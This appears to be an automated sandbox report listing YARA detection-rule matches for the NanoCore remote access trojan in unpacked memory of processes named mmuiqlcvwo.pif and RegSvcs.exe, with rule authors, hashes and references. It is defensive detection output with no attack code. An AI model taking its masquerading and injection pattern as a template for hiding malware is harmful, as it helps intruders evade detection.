Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.a30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.a30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.247e010.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.247e010.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.26b4de0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.26b4de0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
